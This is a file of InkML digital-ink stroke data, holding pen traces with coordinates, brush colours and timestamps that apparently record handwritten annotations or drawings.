  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="743237.9747">14021 8971,'0'0,"-30"-8,30 8,0 0,-65-13,65 13,-100-22,-19-3,-11-3,-19-1,13 5,16 9,38 4,49 7,35 2,36-7,29-4,20-12,-8-6,-33-3,-39 8,-36 4,-35 9,-18 20,2 19,28 31,49 19,40 10,32-9,14-15,-11-14,-2-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="765715.2222">15045 8915,'0'0,"0"4,0-4,0 0,0 0,16 7,-16-7,0 0,52 5,-52-5,105-1,22-6,2-23,0-33,-20-36,-17-29,-9-27,-35-11,-39-31,-44 9,-39-13,-29 5,-30 15,-19 24,-24 26,-16 32,-23 32,-28 19,15 18,11 6,23 6,-15 1,25 9,47 5,37 3,38-3,17-4,15-2,21-3,10-5,14-2,12-1,14-5,6-3,4-4,-2 0,-2 2,0 3,-11 14,-34 16,-48 22,-51 17,-21 6,-9 10,29-4,51-7,52-4,57 8,45 6,21-2,-13 11,-53 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="769444.5951">15383 8967,'-15'-16,"-5"1,20 15,0 0,0 0,-3-3,3 3,0 0,12 5,-12-5,57 26,54 20,34 29,6 31,-35 29,-53 38,-30 25,-22 35,-21 24,-49 13,-64 10,-79 36,-30-7,-46 17,-43-9,-39-28,-90-7,-28-39,-34-27,-24-26,-35-51,-6-59,-37-71,59-66,46-53,-6-41,74-16,34-21,79-18,66-31,91-11,58 23,52 25,31 59,-5 47,-22 19,-15 28,-18 4,5 2,-21-1,0 16,15 14,31 17,30 7,29-4,22-2,33-13,36-8,12-12,3-12,-8 6,-49 19,-43 12,-30 6,-74 4,-32 8,10 14,47 10,64 10,87 37,45 15,-16-1,-34 3,-35 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="790893.7398">18337 12633,'4'-12,"18"-7,-22 19,0 0,48-15,-48 15,64-12,-4 1,11-3,14 22,28 14,19 11,-27-17,-6-14,-17-13,12-16,12 4,32 16,11 28,31 28,1 10,-42-26,-12-36,-12-36,17-15,11 9,18 32,34 29,32 25,-49-9</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20:54.636"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3892 3241,'14'-17,"-24"5,10 12,0 0,0 0,-42-4,42 4,0 0,-65 1,65-1,-97 22,-36-4,-18-17,-11-16,-11-9,-11-9,14 9,18 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2236.2236">4959 9285,'-2'3,"-16"7,18-10,-48 5,-32 2,-16-19,-11-1,21 11,2 2,-11 4,-5-9,-3 4,-1-15,13 15,1-8,-31 6,-3 2,-9-9,-8-3,-2 11,-12 7,-24 3,17 4,15 4,-12-11,15 5,6-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51963.1958">21781 10191,'68'37,"-42"-28,-26-9,0 0,0 0,11-19,-11 19,0 0,12-58,-12 58,1-82,-11-29,-15-22,-22-19,-26-13,-14 7,-8 19,-1 6,25 37,15 45,33 28,30 18,24 17,24 10,10 0,-13-24,-26-6,-31-17,-16-28,-43 5,-20 5,-1 18,12 26,47 43,31 26,23 21,-25-5,-27 2,-49 22</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22:12.122"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">23726 10251,'17'-23,"5"-10,-22 33,0 0,21-8,-21 8,22-3,4 1,-26 2,24-5,-7 4,0 1,3 2,8 23,-1 23,-2 9,-9 20,-9 18,-7 30,-27 14,-25 16,-10-23,-2 45,21 24,16-14,17 24,2-26,-8-23,-4-26,-21-33,-26-20,-43-18,-58-65,-47-39,-23-25,-25 1,33 37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2467.2467">6345 11018,'6'0,"-4"1,-2-1,0 0,0 0,0 0,2-1,-2 1,0 0,0 0,12-7,-12 7,0 0,17-9,-17 9,34-7,9 0,-43 7,63-6,26-2,11 5,28 1,15 2,25 0,7 4,14-5,21-2,9-1,12 0,14-4,-1-6,2-5,47-1,-7 6,5 2,3 0,-6-2,-12-1,40 6,2 15,-15 1,4 13,-33-3,-13-1,15-13,-15-6,-10 0,5-2,-35-5,-22-6,15 8,-2 9,11 7,28 5,-6-4,-23-5,8 3,-21 2,-19 6,-3 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23255.3253">10418 12494,'-9'-58,"28"10,-19 48,38-38,24 9,35 5,38 25,12 31,-54 27,-65 6,-71 15,-34-12,-6-10,30-14,43-17,53 5,96 20,20 27,-41 17,-80-16,-64-12,-84-23,-55-14,-16-8,61-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23925.3923">11786 12868,'-5'5,"6"30,-1-35,0 0,29 70,-29-70,55 81,22-1,-5-36,-16-38,-13-39,-11-38,-19-14,-3 11,7 50,7 29,36 46,20 43,5 32,-36 3,-49-38,-64-38,-79-49,0-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24430.4428">12666 13071,'51'-18,"-20"-10,-31 28,36-54,-16-10,-16 5,-25 25,-28 18,3 43,17 38,37 23,47-7,20-15,7-28,-9-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24685.4683">13274 13158,'-18'-29,"-3"-35,21 64,-14-77,21-7,38 20,30 26,0 22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25432.543">13438 13268,'14'-15,"-7"-24,-7 39,0 0,-1-68,1 68,5-87,4-14,-8 33,-5 34,0 29,2 37,35 49,30 26,16-12,-11-20,-11-24,-38-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25783.5781">13978 13147,'51'57,"-27"-16,-24-41,6 13,-6-30,-11-48,2-39,18-2,10 30,37 37,14 20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26168.6166">14650 12801,'-61'-8,"-14"17,19 17,41-1,48 3,43 5,13-1,1 8,-28 8,-37 0,-36 2,-39-16,-28-23,-8-7,41 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26987.6985">15896 12883,'-5'-1,"3"30,2-29,0 0,-2 74,2-74,9 108,8 7,-3-40,-6-52,-7-31,-12-63,-16-35,-2-52,12 34,37 57,45 49,3 50,5 42,-29 25,-49-29,-40-27,-48-34,-7-17,24 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27291.7289">16279 13183,'7'-10,"-9"-17,2 27,0 0,0 0,-16-45,16 45,0 0,-1-50,1 50,10-56,22-16,7 1,8 17,-5 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27658.7656">16675 12880,'-10'-6,"-16"15,26-9,0 0,0 0,-28 36,28-36,0 0,-22 62,22-62,20 76,33-6,30-24,-15-41,-30-43,-55-61,-48 0,-17 30,10 27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28527.8525">16980 12315,'20'-5,"0"41,-20-36,28 126,-7 41,-15 6,-5-29,9-63,-3-53,-1-33,-1-49,18-36,22-10,8 68,18 49,10 55,-47 17,-38-15,-46-29,-58-43,-3-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28931.8929">17696 13068,'19'-18,"-30"-3,11 21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30523.052">17762 12976,'14'-27,"0"-26,-14 53,0 0,18-35,-18 35,12-22,-12 13,-24 5,-35 14,-5 23,4 37,33 21,30-24,32-36,16-34,4-35,-18-24,-9-32,-12 55,10 57,24 68,-12 18,-15-15,-3-38,-4-56,-13-61</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30778.0775">18089 12413,'1'11,"1"38,-2-49,5 110,3 19,1 14,-3-16,8-61</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="30973.097">18193 12915,'-32'7,"-41"-12,73 5,-75-13,21 15,36 3,11 4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="31228.1225">18363 12782,'-2'71,"11"14,4-9,14-19,-12-30,-20-49</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="31357.1354">18289 12686,'9'-44,"3"24,-12 20,0 0,0 0,13-12,-13 12,0 0,31-7,-31 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="31724.1721">18704 12889,'-5'17,"-7"42,12-59,13 72,26 0,14-27,-6-29,-4-46,-43-36,-33-17,-32 26,19 33,21 26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32080.2077">18977 12878,'47'-6,"-13"55,-34-49,24 78,-23-13,-19-17,16-42,10-33,4-46,26-11,30 6,-14 50,2 60,-1 43,-4 17,-33 5,-34 3</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7:35:43.800"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15323 7221,'37'-25,"-11"-10,-26 35,39-46,20-3,33 8,35 12,26 20,53 26,11 29,-21 30,-5 26,11 59,-20 37,-27 22,-56 12,-38 42,-60 0,-57 8,-45-9,-75-4,-53-37,-40-45,-29-55,-34-62,8-68,10-74,31-68,32-66,77-39,46-35,38-21,64-40,100 32,82 25,79 28,11 44,8 33,-31 41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="990">15903 8207,'2'-12,"-16"0,14 12,0 0,0 0,-33-10,33 10,0 0,-62-7,62 7,-76 13,3 25,8 44,3 3,21-2,50 1,46-17,49-23,49-43,5-49,-27-55,-72-22,-99 14,-65 18,-39 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2451">14849 8967,'6'-7,"-3"21,-3-14,0 0,19 59,-19-59,32 100,6 33,-12-10,-22-22,-7-35,0-35,4-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2793">15125 9173,'19'-9,"-23"21,4-12,0 0,0 0,-22 35,22-35,0 0,-35 50,35-50,-33 51,5-7,26 3,4-14,22-10,15 3,13 19,-5 1,-18-11,-15-12,-14-18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3167">15223 9517,'48'-15,"8"-8,-56 23,68-38,-36-13,-25 4,-35 6,-38 10,2 18,9 34,31 30,37 19,32-4,24-6,12-16,1-20,-7-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3366">15650 9589,'-1'-23,"-14"-13,15 36,0 0,-11-52,11 52,-10-64,28-6,6 16,1 29,-9 7,-13 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3820">15781 9221,'38'58,"3"18,-5 5,-12-26,-2-34,-15-30,-5-53,-8-21,17-22,7 23,9 41,12 42,7 53,-10 42,-12 9,-12-13,3-31,-9-51</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4196">16224 9229,'31'-5,"11"6,-42-1,0 0,38-8,-38 8,52-30,-21-18,-23-5,-28 11,-14 23,-6 32,-7 32,15 23,27 11,53-4,15-19,14-23,-11-28,-16-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4519">16563 8650,'3'28,"16"48,-19-76,18 111,15 22,-4-14,9-18,-13-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6383">18000 4392,'81'-32,"-23"19,18 18,36 13,22 12,18 22,23 19,30 41,30 45,24 39,4 52,-38 23,-19 30,-9 42,-19 58,-27 6,-47 19,-60 3,-51 38,-50-21,-47 6,-66-28,-76 4,-65-49,-42-28,-52-13,-50-12,-25-52,-59-26,-53-24,0-29,-4-28,-25-35,27-57,-10-51,-25-52,57-53,37-58,17-62,58-54,44-52,52-64,80-11,71-24,67 1,58-50,64 16,53-4,57 11,71-15,46 29,47 33,68-3,33 42,44 37,19 35,58 6,-8 42,2 39,28 10,-25 28,-8 20,6 12,-24 25,-15 22,-29 17,26 24,-53 21,-51 20,-13 7,-53 20,-30 37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="10305">9811 5801,'45'-114,"28"-9,43-15,55-17,38-4,58-11,77-7,44 4,36 4,32 6,68-1,2 22,20 13,2 18,35 10,-28 26,-19 21,26 21,-32 16,-5 16,25 30,-78 15,-58 25,-3 30,-54 33,-1 39,-35 41,-15 57,-70 8,-51 36,-10 55,-33 32,-23 31,-19 28,-63-11,-43-1,-37 36,-26-4,-19-72,-58 7,-31-48,-31-34,-28 4,9-17,-4-15,-6-34,-44-5,-9-35,-9-10,11-13,-14 24,-1-26,-28-19,-37-5,15-11,-8-12,-16-16,2-42,-20-29,-48-13,27-13,-4-15,11-17,-42-28,15-20,8-20,-16-32,15-21,12-27,-15-39,24-17,32-22,-9-50,58-13,26-32,5-52,46 0,54 0,35-38,47-3,38-5,31-38,32 31,47 34,72-3,33 56,12 10,19-8,11 29,1 22,14-6,-6 21,-33 16,10 17,7 49,17 41,-1 40,-8 30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="11350">9607 6986,'-2'-11,"-1"-21,3 32,0 0,-2-47,2 47,2-69,21-14,29 4,38 16,13 42,-7 45,-31 37,-37 4,-26-9,-22-11,6-26,12-16,19-9,28-4,9 22,23 31,-19 21,-40 7,-59 9,-64-7,-39-20,24-24,47-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12064">11869 5253,'0'-2,"-4"3,4-1,0 0,0 0,-3 14,3-14,0 0,18 57,-18-57,64 88,23-8,-4-42,7-43,-18-59,-36-48,-29-8,-26 28,12 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="12756">12683 4851,'-31'30,"-1"0,32-30,-29 45,6-6,14-11,9-15,18-4,19-9,0 11,7 1,0 29,-16 6,-35-3,-23-9,-38-18,-13-16,7-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13222">12821 5069,'38'-14,"0"-12,-38 26,57-54,-17-15,-24 12,-17 22,-20 27,-17 31,0 42,25 18,23-5,31-16,15-26,14-33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13387">13252 5109,'32'-3,"-15"-8,-17 11,0 0,0 0,-1-23,1 23,0 0,3-49,-3 49,4-61,10-5,26 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13640">13921 4598,'-14'-2,"-41"4,55-2,-75 1,14 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="13960">14024 4056,'-1'35,"12"68,-5 42,7 23,5-32,5-26,0-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14335">14248 4616,'41'-8,"16"-2,-57 10,50-25,-15-14,-25-10,-42 6,-5 30,-8 33,2 35,30 10,25-1,34-11,21-24,0-41,15-41</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="14627">14536 4291,'21'29,"28"42,-49-71,56 83,-3-21,-7-25,-3-37,-11-40,-9-29,-13-15,-8 13,9 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15033">15019 4399,'46'-4,"-16"-7,-30 11,0 0,47-20,-47 20,66-39,-17-9,-24 1,-23 17,-25 18,-20 22,-20 28,24 17,22 14,42-7,43-12,19-28,5-44,-5-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="15260">15508 3780,'5'-18,"-7"29,2-11,0 0,2 74,-2-74,0 120,25 27,16 7,3-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24553">6288 10096,'-11'3,"16"-4,-5 1,0 0,70-33,-70 33,148-64,78-26,57-18,81-26,112-46,55-12,41 8,83-8,18 19,4 13,-20 29,-8 28,-70 38,-57 18,-29 18,-155 20,-147 11,-112 0,-73-1,-37-3,-60-15,-15-19,12-21,28-9,35 25,26 30,45 25,77 28,54 24,56 16,-10 10,-71-15,-60-17,-80-18,-64-12,-86-10,-35-9,-2 3,33 8,65 20,30 6,0 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25537">2429 10581,'-54'46,"-13"10,18 27,19 0,37-19,39-31,30-49,20-30,7-11,-14 23,-23 32,-35 48,-51 14,-55 25,-25-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26022">2708 10670,'44'86,"21"16,4-4,0-25,-2-29,-36-40,-29-24,-49-36,-27-26,-22-51,29 30,50 43,32 9,35 50,8 37,-17 44,-30 0,-18-5,-10-35,7-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26364">3078 10572,'30'-34,"-8"-9,-22 43,0 0,2-38,-2 38,-32-46,-14 38,3 18,19 19,19 26,25 14,15-12,23-19,-3-38,5-18,-13-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26624">3348 10176,'-25'7,"-3"21,28-28,0 0,-14 62,14-62,11 71,30-18,31-17,10-33,-10-24,-26-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26820">3550 10099,'31'64,"10"-3,-10-13,-2-23,-22-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26948">3450 10001,'-62'-52,"27"17,35 35,-1-15,24 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27355">3902 9871,'-45'23,"3"26,42-49,-23 67,32 8,37-18,19-31,-14-38,-18-28,-26-18,-18 10,3 18,11 29,25 33,6 16,11 6,-8-10,-20-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="27586">3807 9509,'21'-12,"36"51,-57-39,77 86,-3 23,-9 2,4 9,-6-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28249">3523 11351,'48'52,"18"37,2 38,3-6,-11-37,-11-49,-22-63,-34-62,-38-59,-33-12,-23 53,41 54,44 34,26 7,45 14,28 41,-22 11,-38 9,-45-6,-31 4,-2-31,4-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28623">3962 11095,'36'57,"-2"17,-3-12,-15-35,0-22,-16-40,-27-29,-12-21,4-5,20 22,33 27,14 9,7 23,-13 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="28861">4241 10864,'49'40,"-7"30,1-7,-4-9,-21-40,-6-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="29029">4043 10759,'-18'-12,"15"8,3 4,0 0,0 0,4-2,-4 2,0 0,23-2,-23 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="29334">4456 10822,'87'36,"-8"13,-9-14,-26-26,-20-13,-21-32,-37-28,-10-34,1 7,16 33,16 26,15 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="29708">4956 10429,'-24'-14,"-47"32,71-18,-72 47,39 17,36-22,40-17,26-29,18-15,-3 0,-5 8,-12 35,-27 21,-26 29,-29-7,-15-7,-19-30</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="31069">5082 6002,'97'-1,"18"5,27 13,41 2,54 6,34 19,35 16,30 18,39 35,-36 13,-31 15,-13 5,-30-3,-13-2,-66-22,-64-17,-35-19,-28-24,-3-17,-10-21,-18-17,-10-19,-4-27,-15-27,-3-10,1 15,-1 32,16 24,7 23,1 23,-2 34,-20 8,-10-7,-9-5,-14-18,-36-19,-26-31,-35-16,19-1,26 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32202">2546 6753,'48'56,"6"30,12 9,4-6,-10 0,-30-86,-25 2,-24-14,-36-42,-20-13,2-19,15-41,43 31,18 19,23 33,14 32,21 24,-8 41,-33 14,-31 8,-27-10,-8-11,7-39</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32608">3002 6772,'-1'20,"-6"-14,7-6,0 0,0 0,-10-3,10 3,0 0,-13-33,13 33,-15-41,8-30,7 71,-3-85,10 3,7 30,2 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="32980">3160 6317,'0'0,"-11"22,11-22,0 0,0 0,-5 45,5-45,0 0,17 67,-17-67,56 45,18-11,4-42,-15-25,-37-26,-35 2,-37-2,-11 33,-9 31,-2 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33410">3706 5974,'-29'4,"-8"14,37-18,0 0,-28 43,28-43,-15 47,19 30,26 4,23-14,10-38,5-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33962">3983 6050,'11'-6,"1"1,-12 5,0 0,0 0,20-10,-20 10,0 0,41-34,-41 34,38-24,-20-19,-21 18,-20 16,-23 12,-11 33,9 8,13 23,38-6,42-23,41-28,-9-15,5-31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="34409">4339 5538,'-24'15,"-22"31,46-46,-42 63,23 3,22-6,18-34,9-12,11-20,13-16,4 6,-5 25,-15 6,-19 21,-41 5,-23 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="34838">4590 5386,'-30'39,"-8"15,38-54,-25 38,21 4,22-28,24-3,16-18,11-7,4 10,-21 14,-33 29,-38 16,-40 24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36148">5278 5097,'-34'-18,"-10"21,44-3,-59 19,9 30,32 29,39 0,42-29,22-36,-18-36,-37-26,-32-13,-15-19,-16 21,11 43,25 21,41 46,5 22,5 13,-19-35,-8-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36637">5100 4637,'12'-11,"38"41,-50-30,71 66,30 48,4 17,-19-16,-17-30,-32-46,-29-39,-17-38,0-21,7-15,10 11,38 45,26 41,-2 25,-32 24,-34-16,-33-9,-47-19,-22-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37021">5904 4757,'-45'58,"6"21,20-11,22-29,20-28,18-20,2-13,2-1,1 9,-9 25,-14 26,-33 12,-24-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37293">5849 4371,'63'53,"19"51,9 24,-5-3,-22-22,-15-48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37470">6181 4743,'-13'3,"-21"11,34-14,0 0,-54 15,54-15,-48 13,24-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37695">6544 4872,'1'-13,"-43"-31,42 44,-53-60,25-24,31 5,28 20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38067">6698 4505,'-15'23,"-14"21,29-44,-8 61,25-2,36-27,1-22,-27-29,-30-13,-15-23,-10 13,15 20,15 22,17 21,3 8,-3 5,0-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38357">7016 4322,'-24'16,"-15"30,39-46,-21 65,31 5,38-27,15-20,11-33,-26-32,-18-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38553">7042 3977,'5'5,"41"57,-46-62,46 96,23 30,-4-16,1-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38730">7311 4324,'-20'-8,"-15"19,35-11,0 0,-54 18,54-18,-38 11,26-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38922">7442 4185,'38'41,"-6"18,-32-59,29 63,-3-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39084">7425 4052,'-4'-30,"2"14,2 16,0 0,7-9,-7 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39343">7789 4239,'21'53,"3"-7,-24-46,0 0,0 0,19 11,-19-11,0 0,22-20,-22 20,16-48,-31-5,15 53,0 0,0 0,0 0,-45-43,45 43,0 0,0 0,-73-15,73 15,0 0,-78-5,78 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39732">7939 4112,'42'4,"-15"26,-27-30,0 0,24 38,-24-38,11 32,-8-19,-4-18,-14-31,-12-16,4-18,28-8,21 14,30 49,35 49,-10 26,-16 21,-16 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="40376">3498 7089,'0'-3,"2"17,-2-14,0 0,18 63,-18-63,68 87,6-6,-3 13,-30-25,-20-44,-15-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="40555">3853 7290,'17'4,"14"15,-31-19,0 0,0 0,28 26,-28-26,0 0,27 26,-27-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="40700">3951 7236,'-39'-51,"12"12,27 39,-16-34,24-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41209">4081 7149,'61'69,"-4"-24,-30-23,-12-23,-6-18,-13-40,-1 5,3-4,3-2,5 44,18 10,13 15,-3 15,-14-6,-8-15,3-14,-1-28,-4-4,-4-8,7 8,9 25,23 27,6 16,-13 3,-11 5,-9-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41417">4722 6778,'46'22,"-3"25,-43-47,26 56,-13-36,0-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41563">4657 6571,'-25'-46,"9"25,16 21,0 0,-5-26,5 26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41821">4677 6258,'46'5,"15"53,1 24,15 19,4-3,-21-22,-9-29,-18-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42029">5052 6508,'-35'6,"-24"16,59-22,-55 18,22-8,13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42465">5304 6308,'-7'-10,"-16"17,23-7,0 0,0 0,0 0,-20 28,20-28,0 0,0 0,-7 41,7-41,0 0,2 27,-2-27,21 17,24-21,-45 4,0 0,66-14,-66 14,81-16,-4 12,-7 33,-43 13,-28 22,-36 8,-43 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="77865">6919 12009,'-5'-4,"15"-4,-10 8,0 0,42-17,-42 17,81-14,43 9,33 10,54 6,61-1,43 12,42 10,67 9,18 2,12 7,5 12,-55 8,-46 7,-42 2,-62-13,-87-22,-90-37,-85-46,-74-61,-48-36,-2 19,24 58,65 52,63 55,56 52,70 39,34-22,-23-20,-114-31,-95-20,-98-22,-73-18,-39 1,5-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="78858">5798 12459,'-7'-8,"-12"5,19 3,0 0,-43 11,43-11,-65 26,5 19,25 11,46 9,33-22,19-36,15-24,-30-22,-34-8,-24-2,-26 18,3 21,27 11,30 20,44 27,19 33,-8 18,-50-5,-26-5,-45-27,-39-31,-1-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="79327">5921 12352,'-10'-15,"-9"13,19 2,0 0,0 0,-19 14,19-14,0 0,-20 37,20-37,-4 80,25 1,14-31,13-37,-17-36,-23-22,-27-31,-4 2,2 37,23 34,26 30,10 25,-2 17,-11-18,-7-26,-16-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="79718">6061 12140,'-12'-23,"-11"11,23 12,0 0,0 0,-9 2,9-2,0 0,-12 22,12-22,0 41,11-12,-11-29,0 0,0 0,0 0,0 0,0 0,34 26,-34-26,0 0,0 0,0 0,0 0,37 3,-37-3,0 0,0 0,0 0,36-21,-36 21,0 0,0 0,33-22,-33 22,0 0,31-13,-31 13,30 15,-12 37,-19 16,-25-15,-3-1,-6-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="80219">6034 11642,'53'65,"33"41,-5 24,-12-10,-27-38,-10-33,-26-41,-8-31,-4-39,5-21,9-4,18 34,17 43,19 41,5 31,-4 15,-15 0,-24-12,-13-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="92737">10993 11916,'18'-14,"-5"-3,-13 17,0 0,0 0,0-36,0 36,0 0,-10-54,10 54</inkml:trace>
